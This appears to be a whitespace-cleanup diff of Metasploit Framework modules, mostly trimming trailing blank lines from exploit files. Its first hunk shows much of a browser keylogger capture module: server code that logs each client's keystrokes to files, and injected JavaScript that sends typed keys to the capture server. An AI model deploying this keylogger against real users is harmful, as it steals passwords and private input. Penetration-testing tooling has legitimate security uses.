-50,7 +49,7 @@ class Metasploit3 < Msf::Auxiliary def on_request_uri(cli, request) cid = nil - + if request['Cookie'].to_s =~ /,?\s*id=([a-f0-9]{4,32})/i cid = $1 end @@ -58,13 +57,13 @@ class Metasploit3 < Msf::Auxiliary if not cid and request.qstring['id'].to_s =~ /^([a-f0-9]{4,32})/i cid = $1 end - - data = request.qstring['data'] - + + data = request.qstring['data'] + unless cid cid = generate_client_id(cli,request) print_status("#{cli.peerhost} Assigning client identifier '#{cid}'") - + resp = create_response(302, 'Moved') resp['Content-Type'] = 'text/html' resp['Location'] = request.uri + '?id=' + cid @@ -72,11 +71,11 @@ class Metasploit3 < Msf::Auxiliary cli.send_response(resp) return end - + base_url = generate_base_url(cli, request) - + # print_status("#{cli.peerhost} [#{cid}] Incoming #{request.method} request for #{request.uri}") - + case request.uri when /\.js(\?|$)/ content_type = "text/plain" @@ -87,13 +86,13 @@ class Metasploit3 < Msf::Auxiliary content_type = "text/html" send_response(cli, generate_demo(base_url, cid), {'Content-Type'=> content_type, 'Set-Cookie' => "id=#{cid}"}) else - send_not_found(cli) + send_not_found(cli) end else if data nice = process_data(cli, request, cid, data) - script = datastore['DEMO'] ? generate_demo_js_reply(base_url, cid, nice) : "" + script = datastore['DEMO'] ? generate_demo_js_reply(base_url, cid, nice) : "" send_response(cli, script, {'Content-Type' => "text/plain", 'Set-Cookie' => "id=#{cid}"}) else if datastore['DEMO'] @@ -104,17 +103,17 @@ class Metasploit3 < Msf::Auxiliary end end end - + # Figure out what our base URL is based on the user submitted # Host header or the address of the client. def generate_base_url(cli, req) port = nil host = Rex::Socket.source_address(cli.peerhost) - + if req['Host'] host = req['Host'] bits = host.split(':') - + # Extract the hostname:port sequence from the Host header if bits.length > 1 and bits.last.to_i > 0 port = bits.pop.to_i @@ -123,17 +122,17 @@ class Metasploit3 < Msf::Auxiliary else port = datastore['SRVPORT'].to_i end - + prot = (!! datastore['SSL']) ? 'https://' : 'http://' if Rex::Socket.is_ipv6?(host) host = "[#{host}]" end - + base = prot + host if not ((prot == 'https' and port.nil?) or (prot == 'http' and port.nil?)) base << ":#{port}" end - + base << get_resource end @@ -156,12 +155,12 @@ class Metasploit3 < Msf::Auxiliary lines[-1] << byte end end - + nice = lines.join("").gsub("\t", "") real = real.gsub("\x08", "") - + if not @client_cache[cid] - + fp = fingerprint_user_agent(request['User-Agent'] || "") header = "Browser Keystroke Log\n" header << "=====================\n" @@ -181,14 +180,14 @@ class Metasploit3 < Msf::Auxiliary print_good("#{cli.peerhost} [#{cid}] Logging clean keystrokes to: #{@client_cache[cid][:path_clean]}") print_good("#{cli.peerhost} [#{cid}] Logging raw keystrokes to: #{@client_cache[cid][:path_raw]}") end - + ::File.open( @client_cache[cid][:path_clean], "a") { |fd| fd.puts nice } - ::File.open( @client_cache[cid][:path_raw], "a") { |fd| fd.write(real) } - + ::File.open( @client_cache[cid][:path_raw], "a") { |fd| fd.write(real) } + if nice.length > 0 print_good("#{cli.peerhost} [#{cid}] Keys: #{nice}") end - + nice end @@ -231,7 +230,7 @@ EOS # This is the JavaScript Key Logger Code def generate_keylogger_js(base_url, cid) - + targ = Rex::Text.rand_text_alpha(12) code = <"); else { f#{@seed} = document.createElement("script"); - f#{@seed}.setAttribute("id", t#{@seed}); - f#{@seed}.setAttribute("name", t#{@seed}); + f#{@seed}.setAttribute("id", t#{@seed}); + f#{@seed}.setAttribute("name", t#{@seed}); } - + f#{@seed}.setAttribute("src", "#{base_url}?id=#{cid}&data=" + l#{@seed}); f#{@seed}.style.visibility = "hidden"; - + document.body.appendChild(f#{@seed}); if (k#{@seed} == 13 || l#{@seed}.length > 3000) l#{@seed} = ","; - - setTimeout('document.body.removeChild(document.getElementById("' + t#{@seed} + '"))', 5000); + + setTimeout('document.body.removeChild(document.getElementById("' + t#{@seed} + '"))', 5000); } EOS return code @@ -304,8 +303,5 @@ EOS EOS return code end - - end - diff --git a/modules/auxiliary/server/capture/smb.rb b/modules/auxiliary/server/capture/smb.rb index 5fb2ebcef8..9ea4139846 100644 --- a/modules/auxiliary/server/capture/smb.rb +++ b/modules/auxiliary/server/capture/smb.rb @@ -660,4 +660,3 @@ class Metasploit3 < Msf::Auxiliary end end - diff --git a/modules/auxiliary/server/dns/spoofhelper.rb b/modules/auxiliary/server/dns/spoofhelper.rb index b7aacda12c..4e18eb4a6b 100644 --- a/modules/auxiliary/server/dns/spoofhelper.rb +++ b/modules/auxiliary/server/dns/spoofhelper.rb @@ -110,4 +110,4 @@ class Metasploit3 < Msf::Auxiliary end end -end \ No newline at end of file +end diff --git a/modules/auxiliary/server/fakedns.rb b/modules/auxiliary/server/fakedns.rb index 1f6a6811d0..ee72386812 100644 --- a/modules/auxiliary/server/fakedns.rb +++ b/modules/auxiliary/server/fakedns.rb @@ -211,4 +211,3 @@ class Metasploit3 < Msf::Auxiliary end end - diff --git a/modules/auxiliary/server/pxexploit.rb b/modules/auxiliary/server/pxexploit.rb index 89bec3ff3c..4ed4ca7aa8 100644 --- a/modules/auxiliary/server/pxexploit.rb +++ b/modules/auxiliary/server/pxexploit.rb @@ -91,4 +91,3 @@ class Metasploit3 < Msf::Auxiliary end end - diff --git a/modules/auxiliary/sniffer/psnuffle.rb b/modules/auxiliary/sniffer/psnuffle.rb index 1d002f884f..08a8ad5cf3 100644 --- a/modules/auxiliary/sniffer/psnuffle.rb +++ b/modules/auxiliary/sniffer/psnuffle.rb @@ -212,4 +212,3 @@ class BaseProtocolParser end end - diff --git a/modules/auxiliary/sqli/oracle/dbms_cdc_publish2.rb b/modules/auxiliary/sqli/oracle/dbms_cdc_publish2.rb index 531c33a05e..e4518a2e93 100644 --- a/modules/auxiliary/sqli/oracle/dbms_cdc_publish2.rb +++ b/modules/auxiliary/sqli/oracle/dbms_cdc_publish2.rb @@ -31,7 +31,7 @@ class Metasploit3 < Msf::Auxiliary [ [ 'CVE', '2010-0870' ], [ 'OSVDB', '63772'], - [ 'URL', 'http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuapr2010.html' ], + [ 'URL', 'http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuapr2010.html' ] ], 'DisclosureDate' => 'Apr 26 2010')) diff --git a/modules/auxiliary/sqli/oracle/jvm_os_code_10g.rb b/modules/auxiliary/sqli/oracle/jvm_os_code_10g.rb index 3f6d1ad31b..3c230cca7d 100644 --- a/modules/auxiliary/sqli/oracle/jvm_os_code_10g.rb +++ b/modules/auxiliary/sqli/oracle/jvm_os_code_10g.rb @@ -73,4 +73,3 @@ class Metasploit3 < Msf::Auxiliary end end - diff --git a/modules/auxiliary/sqli/oracle/jvm_os_code_11g.rb b/modules/auxiliary/sqli/oracle/jvm_os_code_11g.rb index 45feda99a3..0aed4857b6 100644 --- a/modules/auxiliary/sqli/oracle/jvm_os_code_11g.rb +++ b/modules/auxiliary/sqli/oracle/jvm_os_code_11g.rb @@ -62,4 +62,3 @@ class Metasploit3 < Msf::Auxiliary end end - diff --git a/modules/auxiliary/voip/sip_invite_spoof.rb b/modules/auxiliary/voip/sip_invite_spoof.rb index e4d83f8c36..a7f169a201 100644 --- a/modules/auxiliary/voip/sip_invite_spoof.rb +++ b/modules/auxiliary/voip/sip_invite_spoof.rb @@ -63,4 +63,4 @@ class Metasploit3 < Msf::Auxiliary end end -end \ No newline at end of file +end diff --git a/modules/auxiliary/vsploit/malware/dns/dns_mariposa.rb b/modules/auxiliary/vsploit/malware/dns/dns_mariposa.rb index c4e1ed69a4..adc18b0953 100644 --- a/modules/auxiliary/vsploit/malware/dns/dns_mariposa.rb +++ b/modules/auxiliary/vsploit/malware/dns/dns_mariposa.rb @@ -80,4 +80,3 @@ class Metasploit3 < Msf::Auxiliary end end end - diff --git a/modules/auxiliary/vsploit/malware/dns/dns_query.rb b/modules/auxiliary/vsploit/malware/dns/dns_query.rb index a933719f20..9b0f8823b2 100644 --- a/modules/auxiliary/vsploit/malware/dns/dns_query.rb +++ b/modules/auxiliary/vsploit/malware/dns/dns_query.rb @@ -66,4 +66,3 @@ class Metasploit3 < Msf::Auxiliary end end end - diff --git a/modules/auxiliary/vsploit/malware/dns/dns_zeus.rb b/modules/auxiliary/vsploit/malware/dns/dns_zeus.rb index cc0a908457..2648670df7 100644 --- a/modules/auxiliary/vsploit/malware/dns/dns_zeus.rb +++ b/modules/auxiliary/vsploit/malware/dns/dns_zeus.rb @@ -85,4 +85,3 @@ class Metasploit3 < Msf::Auxiliary end end end - diff --git a/modules/auxiliary/vsploit/pii/email_pii.rb b/modules/auxiliary/vsploit/pii/email_pii.rb index 3052e79ba9..8107c615b4 100644 --- a/modules/auxiliary/vsploit/pii/email_pii.rb +++ b/modules/auxiliary/vsploit/pii/email_pii.rb @@ -53,4 +53,3 @@ class Metasploit3 < Msf::Auxiliary resp = send_message(msg.to_s) end end - diff --git a/modules/encoders/x86/alpha_upper.rb b/modules/encoders/x86/alpha_upper.rb index 14332e3746..0a43f3d490 100644 --- a/modules/encoders/x86/alpha_upper.rb +++ b/modules/encoders/x86/alpha_upper.rb @@ -90,4 +90,3 @@ class Metasploit3 < Msf::Encoder::Alphanum state.encoded += Rex::Encoder::Alpha2::AlphaUpper::add_terminator() end end - diff --git a/modules/exploits/bsdi/softcart/mercantec_softcart.rb b/modules/exploits/bsdi/softcart/mercantec_softcart.rb index ec2cc476b1..e8c20766ec 100644 --- a/modules/exploits/bsdi/softcart/mercantec_softcart.rb +++ b/modules/exploits/bsdi/softcart/mercantec_softcart.rb @@ -98,4 +98,3 @@ class Metasploit3 < Msf::Exploit::Remote end end - diff --git a/modules/exploits/hpux/lpd/cleanup_exec.rb b/modules/exploits/hpux/lpd/cleanup_exec.rb index cf45d8c278..786eba79d1 100644 --- a/modules/exploits/hpux/lpd/cleanup_exec.rb +++ b/modules/exploits/hpux/lpd/cleanup_exec.rb @@ -107,4 +107,3 @@ class Metasploit3 < Msf::Exploit::Remote end end - diff --git a/modules/exploits/linux/http/ddwrt_cgibin_exec.rb b/modules/exploits/linux/http/ddwrt_cgibin_exec.rb index fe2549b4ed..98b35ff2f7 100644 --- a/modules/exploits/linux/http/ddwrt_cgibin_exec.rb +++ b/modules/exploits/linux/http/ddwrt_cgibin_exec.rb @@ -74,4 +74,3 @@ class Metasploit3 < Msf::Exploit::Remote end end - diff --git a/modules/exploits/linux/samba/lsa_transnames_heap.rb b/modules/exploits/linux/samba/lsa_transnames_heap.rb index 540fd077b5..514c7cd105 100644 --- a/modules/exploits/linux/samba/lsa_transnames_heap.rb +++ b/modules/exploits/linux/samba/lsa_transnames_heap.rb @@ -340,4 +340,3 @@ class Metasploit3 < Msf::Exploit::Remote end end - diff --git a/modules/exploits/linux/samba/trans2open.rb b/modules/exploits/linux/samba/trans2open.rb index 53fa6865e7..3dae2c66cd 100644 --- a/modules/exploits/linux/samba/trans2open.rb +++ b/modules/exploits/linux/samba/trans2open.rb @@ -161,4 +161,3 @@ class Metasploit3 < Msf::Exploit::Remote end end - diff --git a/modules/exploits/multi/browser/opera_configoverwrite.rb b/modules/exploits/multi/browser/opera_configoverwrite.rb index bead6b987c..cdbaa5893c 100644 --- a/modules/exploits/multi/browser/opera_configoverwrite.rb +++ b/modules/exploits/multi/browser/opera_configoverwrite.rb @@ -141,4 +141,3 @@ ENDJS end end - diff --git a/modules/exploits/multi/handler.rb b/modules/exploits/multi/handler.rb index 413ac27ea2..dae7ce988d 100644 --- a/modules/exploits/multi/handler.rb +++ b/modules/exploits/multi/handler.rb @@ -67,4 +67,3 @@ class Metasploit3 < Msf::Exploit::Remote end - diff --git a/modules/exploits/multi/http/axis2_deployer.rb b/modules/exploits/multi/http/axis2_deployer.rb index febe2d0cdf..f0330cb8bb 100644 --- a/modules/exploits/multi/http/axis2_deployer.rb +++ b/modules/exploits/multi/http/axis2_deployer.rb @@ -313,4 +313,3 @@ class Metasploit3 < Msf::Exploit::Remote end end - diff --git a/modules/exploits/multi/http/spree_search_exec.rb b/modules/exploits/multi/http/spree_search_exec.rb index 2c3f9e93ef..cdbaf05c90 100644 --- a/modules/exploits/multi/http/spree_search_exec.rb +++ b/modules/exploits/multi/http/spree_search_exec.rb @@ -77,4 +77,3 @@ class Metasploit3 < Msf::Exploit::Remote end end - diff --git a/modules/exploits/multi/http/spree_searchlogic_exec.rb b/modules/exploits/multi/http/spree_searchlogic_exec.rb index 5eab20b9a3..e79edf2c21 100644 --- a/modules/exploits/multi/http/spree_searchlogic_exec.rb +++ b/modules/exploits/multi/http/spree_searchlogic_exec.rb @@ -79,4 +79,3 @@ class Metasploit3 < Msf::Exploit::Remote end end - diff --git a/modules/exploits/multi/http/tomcat_mgr_deploy.rb b/modules/exploits/multi/http/tomcat_mgr_deploy.rb index 6ebe62c6ba..7a4c940493 100644 --- a/modules/exploits/multi/http/tomcat_mgr_deploy.rb +++ b/modules/exploits/multi/http/tomcat_mgr_deploy.rb @@ -309,4 +309,3 @@ class Metasploit3 < Msf::Exploit::Remote end end - diff --git a/modules/exploits/multi/wyse/hagent_untrusted_hsdata.rb b/modules/exploits/multi/wyse/hagent_untrusted_hsdata.rb index 3528306c1d..ef8adb049d 100644 --- a/modules/exploits/multi/wyse/hagent_untrusted_hsdata.rb +++ b/modules/exploits/multi/wyse/hagent_untrusted_hsdata.rb @@ -248,4 +248,3 @@ class Metasploit3 < Msf::Exploit::Remote end - diff --git a/modules/exploits/netware/sunrpc/pkernel_callit.rb b/modules/exploits/netware/sunrpc/pkernel_callit.rb index a2219e923e..9eaa359701 100644 --- a/modules/exploits/netware/sunrpc/pkernel_callit.rb +++ b/modules/exploits/netware/sunrpc/pkernel_callit.rb @@ -96,4 +96,3 @@ class Metasploit3 < Msf::Exploit::Remote end end - diff --git a/modules/exploits/solaris/lpd/sendmail_exec.rb b/modules/exploits/solaris/lpd/sendmail_exec.rb index cda2cbeed8..faa54e71f8 100644 --- a/modules/exploits/solaris/lpd/sendmail_exec.rb +++ b/modules/exploits/solaris/lpd/sendmail_exec.rb @@ -172,4 +172,3 @@ class Metasploit3 < Msf::Exploit::Remote end end - diff --git a/modules/exploits/solaris/samba/lsa_transnames_heap.rb b/modules/exploits/solaris/samba/lsa_transnames_heap.rb index 3a14f55d6e..32ddd718c1 100644 --- a/modules/exploits/solaris/samba/lsa_transnames_heap.rb +++ b/modules/exploits/solaris/samba/lsa_transnames_heap.rb @@ -221,4 +221,3 @@ class Metasploit3 < Msf::Exploit::Remote end - diff --git a/modules/exploits/solaris/telnet/fuser.rb b/modules/exploits/solaris/telnet/fuser.rb index 1b083e9e78..284fe48e88 100644 --- a/modules/exploits/solaris/telnet/fuser.rb +++ b/modules/exploits/solaris/telnet/fuser.rb @@ -110,4 +110,3 @@ class Metasploit3 < Msf::Exploit::Remote end end - diff --git a/modules/exploits/solaris/telnet/ttyprompt.rb b/modules/exploits/solaris/telnet/ttyprompt.rb index 907201a7f3..4fde4b7879 100644 --- a/modules/exploits/solaris/telnet/ttyprompt.rb +++ b/modules/exploits/solaris/telnet/ttyprompt.rb @@ -107,4 +107,3 @@ class Metasploit3 < Msf::Exploit::Remote end end - diff --git a/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb b/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb index a36010c407..06b7215d06 100644 --- a/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb +++ b/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb @@ -121,4 +121,3 @@ class Metasploit3 < Msf::Exploit::Remote end end - diff --git a/modules/exploits/unix/http/contentkeeperweb_mimencode.rb b/modules/exploits/unix/http/contentkeeperweb_mimencode.rb index e67f146904..370d9c7ec2 100644 --- a/modules/exploits/unix/http/contentkeeperweb_mimencode.rb +++ b/modules/exploits/unix/http/contentkeeperweb_mimencode.rb @@ -122,5 +122,3 @@ class Metasploit3 < Msf::Exploit::Remote end end - - diff --git a/modules/exploits/unix/irc/unreal_ircd_3281_backdoor.rb b/modules/exploits/unix/irc/unreal_ircd_3281_backdoor.rb index 7f5620178a..d1d7a43327 100644 --- a/modules/exploits/unix/irc/unreal_ircd_3281_backdoor.rb +++ b/modules/exploits/unix/irc/unreal_ircd_3281_backdoor.rb @@ -77,4 +77,3 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end end - diff --git a/modules/exploits/unix/misc/distcc_exec.rb b/modules/exploits/unix/misc/distcc_exec.rb index 978afd64de..69690a1f10 100644 --- a/modules/exploits/unix/misc/distcc_exec.rb +++ b/modules/exploits/unix/misc/distcc_exec.rb @@ -129,4 +129,3 @@ class Metasploit3 < Msf::Exploit::Remote end end - diff --git a/modules/exploits/unix/webapp/awstats_configdir_exec.rb b/modules/exploits/unix/webapp/awstats_configdir_exec.rb index 74ea50df09..199042f8b2 100644 --- a/modules/exploits/unix/webapp/awstats_configdir_exec.rb +++ b/modules/exploits/unix/webapp/awstats_configdir_exec.rb @@ -106,4 +106,3 @@ class Metasploit3 < Msf::Exploit::Remote end end - diff --git a/modules/exploits/unix/webapp/awstatstotals_multisort.rb b/modules/exploits/unix/webapp/awstatstotals_multisort.rb index 480bb9cd97..a529e25dce 100644 --- a/modules/exploits/unix/webapp/awstatstotals_multisort.rb +++ b/modules/exploits/unix/webapp/awstatstotals_multisort.rb @@ -105,4 +105,3 @@ class Metasploit3 < Msf::Exploit::Remote end end - diff --git a/modules/exploits/unix/webapp/nagios3_statuswml_ping.rb b/modules/exploits/unix/webapp/nagios3_statuswml_ping.rb index 0833152a23..a401533b5f 100644 --- a/modules/exploits/unix/webapp/nagios3_statuswml_ping.rb +++ b/modules/exploits/unix/webapp/nagios3_statuswml_ping.rb @@ -111,4 +111,3 @@ class Metasploit3 < Msf::Exploit::Remote end end - diff --git a/modules/exploits/unix/webapp/phpmyadmin_config.rb b/modules/exploits/unix/webapp/phpmyadmin_config.rb index e6e8939bd9..e16c70627e 100644 --- a/modules/exploits/unix/webapp/phpmyadmin_config.rb +++ b/modules/exploits/unix/webapp/phpmyadmin_config.rb @@ -131,4 +131,3 @@ class Metasploit3 < Msf::Exploit::Remote handler end end - diff --git a/modules/exploits/unix/webapp/qtss_parse_xml_exec.rb b/modules/exploits/unix/webapp/qtss_parse_xml_exec.rb index 820476a6d3..8f86aefe2a 100644 --- a/modules/exploits/unix/webapp/qtss_parse_xml_exec.rb +++ b/modules/exploits/unix/webapp/qtss_parse_xml_exec.rb @@ -84,4 +84,3 @@ class Metasploit3 < Msf::Exploit::Remote handler end end - diff --git a/modules/exploits/unix/webapp/redmine_scm_exec.rb b/modules/exploits/unix/webapp/redmine_scm_exec.rb index c563a64ef4..1114236da7 100644 --- a/modules/exploits/unix/webapp/redmine_scm_exec.rb +++ b/modules/exploits/unix/webapp/redmine_scm_exec.rb @@ -80,4 +80,3 @@ class Metasploit3 < Msf::Exploit::Remote end end - diff --git a/modules/exploits/windows/backdoor/energizer_duo_payload.rb b/modules/exploits/windows/backdoor/energizer_duo_payload.rb index f643196f39..ef13cb021e 100644 --- a/modules/exploits/windows/backdoor/energizer_duo_payload.rb +++ b/modules/exploits/windows/backdoor/energizer_duo_payload.rb @@ -124,4 +124,3 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end end - diff --git a/modules/exploits/windows/backupexec/remote_agent.rb b/modules/exploits/windows/backupexec/remote_agent.rb index 3a619b1508..2d352ebd21 100644 --- a/modules/exploits/windows/backupexec/remote_agent.rb +++ b/modules/exploits/windows/backupexec/remote_agent.rb @@ -137,4 +137,3 @@ class Metasploit3 < Msf::Exploit::Remote end end - diff --git a/modules/exploits/windows/brightstor/discovery_tcp.rb b/modules/exploits/windows/brightstor/discovery_tcp.rb index 93bb181d6c..a38e557d8c 100644 --- a/modules/exploits/windows/brightstor/discovery_tcp.rb +++ b/modules/exploits/windows/brightstor/discovery_tcp.rb @@ -148,4 +148,3 @@ class Metasploit3 < Msf::Exploit::Remote end end - diff --git a/modules/exploits/windows/browser/adobe_jbig2decode.rb b/modules/exploits/windows/browser/adobe_jbig2decode.rb index 71c3178aa0..63dacd0589 100644 --- a/modules/exploits/windows/browser/adobe_jbig2decode.rb +++ b/modules/exploits/windows/browser/adobe_jbig2decode.rb @@ -239,4 +239,3 @@ class Metasploit3 < Msf::Exploit::Remote end end - diff --git a/modules/exploits/windows/browser/adobe_media_newplayer.rb b/modules/exploits/windows/browser/adobe_media_newplayer.rb index d8ee0b88bb..86b3e4737b 100644 --- a/modules/exploits/windows/browser/adobe_media_newplayer.rb +++ b/modules/exploits/windows/browser/adobe_media_newplayer.rb @@ -224,4 +224,3 @@ util.printd(#{rand3}, new Date()); end end - diff --git a/modules/exploits/windows/browser/adobe_utilprintf.rb b/modules/exploits/windows/browser/adobe_utilprintf.rb index bc37712720..5e0b0c5989 100644 --- a/modules/exploits/windows/browser/adobe_utilprintf.rb +++ b/modules/exploits/windows/browser/adobe_utilprintf.rb @@ -189,4 +189,3 @@ class Metasploit3 < Msf::Exploit::Remote end end - diff --git a/modules/exploits/windows/browser/ebook_flipviewer_fviewerloading.rb b/modules/exploits/windows/browser/ebook_flipviewer_fviewerloading.rb index f2f132a273..67aa277905 100644 --- a/modules/exploits/windows/browser/ebook_flipviewer_fviewerloading.rb +++ b/modules/exploits/windows/browser/ebook_flipviewer_fviewerloading.rb @@ -111,4 +111,3 @@ for (#{var_i} = 0; #{var_i} < 1324; #{var_i}++) { #{rand8} = #{rand8} + unescape end end - diff --git a/modules/exploits/windows/browser/mozilla_interleaved_write.rb b/modules/exploits/windows/browser/mozilla_interleaved_write.rb index 473a004d24..283cb9a17d 100644 --- a/modules/exploits/windows/browser/mozilla_interleaved_write.rb +++ b/modules/exploits/windows/browser/mozilla_interleaved_write.rb @@ -296,4 +296,3 @@ EOS end end - diff --git a/modules/exploits/windows/browser/ms08_078_xml_corruption.rb b/modules/exploits/windows/browser/ms08_078_xml_corruption.rb index 2325a76b06..b9728e531c 100644 --- a/modules/exploits/windows/browser/ms08_078_xml_corruption.rb +++ b/modules/exploits/windows/browser/ms08_078_xml_corruption.rb @@ -314,4 +314,3 @@ EOS handler(cli) end end - diff --git a/modules/exploits/windows/browser/ms09_072_style_object.rb b/modules/exploits/windows/browser/ms09_072_style_object.rb index 7b89cb5a50..f807fbc909 100644 --- a/modules/exploits/windows/browser/ms09_072_style_object.rb +++ b/modules/exploits/windows/browser/ms09_072_style_object.rb @@ -131,4 +131,3 @@ for (#{var_i}=0;#{var_i}<1285;#{var_i}++) #{var_memory}[#{var_i}]=#{var_bk}+#{va handler(cli) end end - diff --git a/modules/exploits/windows/browser/ms10_018_ie_behaviors.rb b/modules/exploits/windows/browser/ms10_018_ie_behaviors.rb index 47f9597f93..4a4c3ba5c3 100644 --- a/modules/exploits/windows/browser/ms10_018_ie_behaviors.rb +++ b/modules/exploits/windows/browser/ms10_018_ie_behaviors.rb @@ -247,4 +247,3 @@ document.location="about:\\u0c0c\\u0c0c\\u0c0c\\u0c0cblank"; end end - diff --git a/modules/exploits/windows/browser/ms10_022_ie_vbscript_winhlp32.rb b/modules/exploits/windows/browser/ms10_022_ie_vbscript_winhlp32.rb index 3f1e3c0f6c..8b11a09f88 100644 --- a/modules/exploits/windows/browser/ms10_022_ie_vbscript_winhlp32.rb +++ b/modules/exploits/windows/browser/ms10_022_ie_vbscript_winhlp32.rb @@ -328,4 +328,3 @@ MsgBox "Welcome! Press F1 to dismiss this dialog.", ,"Welcome!", "#{unc}", 1 end end - diff --git a/modules/exploits/windows/browser/ms10_042_helpctr_xss_cmd_exec.rb b/modules/exploits/windows/browser/ms10_042_helpctr_xss_cmd_exec.rb index 03dceaf8b0..2da7929056 100644 --- a/modules/exploits/windows/browser/ms10_042_helpctr_xss_cmd_exec.rb +++ b/modules/exploits/windows/browser/ms10_042_helpctr_xss_cmd_exec.rb @@ -347,4 +347,3 @@ if (window.navigator.appName == "Microsoft Internet Explorer") { super end end - diff --git a/modules/exploits/windows/browser/ms10_046_shortcut_icon_dllloader.rb b/modules/exploits/windows/browser/ms10_046_shortcut_icon_dllloader.rb index b2ae46dcce..cb1d120b91 100644 --- a/modules/exploits/windows/browser/ms10_046_shortcut_icon_dllloader.rb +++ b/modules/exploits/windows/browser/ms10_046_shortcut_icon_dllloader.rb @@ -453,4 +453,3 @@ class Metasploit3 < Msf::Exploit::Remote super end end - diff --git a/modules/exploits/windows/browser/webdav_dll_hijacker.rb b/modules/exploits/windows/browser/webdav_dll_hijacker.rb index 77d6b72f2a..18d06b62e1 100644 --- a/modules/exploits/windows/browser/webdav_dll_hijacker.rb +++ b/modules/exploits/windows/browser/webdav_dll_hijacker.rb @@ -378,4 +378,3 @@ class Metasploit3 < Msf::Exploit::Remote super end end - diff --git a/modules/exploits/windows/dcerpc/ms05_017_msmq.rb b/modules/exploits/windows/dcerpc/ms05_017_msmq.rb index 878fd4f56d..5876859957 100644 --- a/modules/exploits/windows/dcerpc/ms05_017_msmq.rb +++ b/modules/exploits/windows/dcerpc/ms05_017_msmq.rb @@ -157,4 +157,3 @@ class Metasploit3 < Msf::Exploit::Remote end end - diff --git a/modules/exploits/windows/dcerpc/ms07_065_msmq.rb b/modules/exploits/windows/dcerpc/ms07_065_msmq.rb index 30a3f537b1..fbd9dc68d2 100644 --- a/modules/exploits/windows/dcerpc/ms07_065_msmq.rb +++ b/modules/exploits/windows/dcerpc/ms07_065_msmq.rb @@ -154,4 +154,3 @@ class Metasploit3 < Msf::Exploit::Remote end end - diff --git a/modules/exploits/windows/email/ms07_017_ani_loadimage_chunksize.rb b/modules/exploits/windows/email/ms07_017_ani_loadimage_chunksize.rb index 09e9b64587..dd1b6bf5e1 100644 --- a/modules/exploits/windows/email/ms07_017_ani_loadimage_chunksize.rb +++ b/modules/exploits/windows/email/ms07_017_ani_loadimage_chunksize.rb @@ -348,4 +348,3 @@ class Metasploit3 < Msf::Exploit::Remote end end - diff --git a/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb b/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb index 508b174ce4..1a8f90c58c 100644 --- a/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb +++ b/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb @@ -507,4 +507,3 @@ class Metasploit3 < Msf::Exploit::Remote return buf end end - diff --git a/modules/exploits/windows/email/ms10_045_outlook_ref_resolve.rb b/modules/exploits/windows/email/ms10_045_outlook_ref_resolve.rb index d5264d7bb3..b253635838 100644 --- a/modules/exploits/windows/email/ms10_045_outlook_ref_resolve.rb +++ b/modules/exploits/windows/email/ms10_045_outlook_ref_resolve.rb @@ -479,4 +479,3 @@ class Metasploit3 < Msf::Exploit::Remote return buf end end - diff --git a/modules/exploits/windows/fileformat/adobe_jbig2decode.rb b/modules/exploits/windows/fileformat/adobe_jbig2decode.rb index fe6f0516dd..e809b3645c 100644 --- a/modules/exploits/windows/fileformat/adobe_jbig2decode.rb +++ b/modules/exploits/windows/fileformat/adobe_jbig2decode.rb @@ -233,4 +233,3 @@ class Metasploit3 < Msf::Exploit::Remote end end - diff --git a/modules/exploits/windows/fileformat/adobe_u3d_meshdecl.rb b/modules/exploits/windows/fileformat/adobe_u3d_meshdecl.rb index fe8a31f744..7f2991aca8 100644 --- a/modules/exploits/windows/fileformat/adobe_u3d_meshdecl.rb +++ b/modules/exploits/windows/fileformat/adobe_u3d_meshdecl.rb @@ -497,4 +497,3 @@ EOF end end - diff --git a/modules/exploits/windows/fileformat/aviosoft_plf_buf.rb b/modules/exploits/windows/fileformat/aviosoft_plf_buf.rb index d34e2b5e80..48f36ccb02 100644 --- a/modules/exploits/windows/fileformat/aviosoft_plf_buf.rb +++ b/modules/exploits/windows/fileformat/aviosoft_plf_buf.rb @@ -124,7 +124,7 @@ MediaPlayerCtrl!DllCreateObject+0x220: 6400f6f0 f3a5 rep movs dword ptr es:[edi],dword ptr [esi] 0:000> !exchain 0012f3bc: *** WARNING: Unable to verify checksum for C:\Program Files\Aviosoft\Aviosoft DTV Player Pro\DTVDeviceManager.dll -*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Aviosoft\Aviosoft DTV Player Pro\DTVDeviceManager.dll - +*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Aviosoft\Aviosoft DTV Player Pro\DTVDeviceManager.dll - DTVDeviceManager+534a (6130534a) Invalid exception stack at 41414141 0:000> !address edi diff --git a/modules/exploits/windows/fileformat/destinymediaplayer16.rb b/modules/exploits/windows/fileformat/destinymediaplayer16.rb index 0e5a63ac75..27b5d41180 100644 --- a/modules/exploits/windows/fileformat/destinymediaplayer16.rb +++ b/modules/exploits/windows/fileformat/destinymediaplayer16.rb @@ -71,4 +71,3 @@ class Metasploit3 < Msf::Exploit::Remote end end - diff --git a/modules/exploits/windows/fileformat/esignal_styletemplate_bof.rb b/modules/exploits/windows/fileformat/esignal_styletemplate_bof.rb index 3d496fc9d3..7941b800b3 100644 --- a/modules/exploits/windows/fileformat/esignal_styletemplate_bof.rb +++ b/modules/exploits/windows/fileformat/esignal_styletemplate_bof.rb @@ -100,4 +100,3 @@ class Metasploit3 < Msf::Exploit::Remote file_create(file) end end - diff --git a/modules/exploits/windows/fileformat/mcafee_showreport_exec.rb b/modules/exploits/windows/fileformat/mcafee_showreport_exec.rb index 829aaea66f..7674c9cc73 100644 --- a/modules/exploits/windows/fileformat/mcafee_showreport_exec.rb +++ b/modules/exploits/windows/fileformat/mcafee_showreport_exec.rb @@ -367,4 +367,4 @@ start end module name .text:2101CB27 push esi .text:2101CB28 mov [ebp+0A50h+Str], eax .text:2101CB2B call off_2105D350 ; ShellExecuteW -=end \ No newline at end of file +=end diff --git a/modules/exploits/windows/fileformat/ms10_038_excel_obj_bof.rb 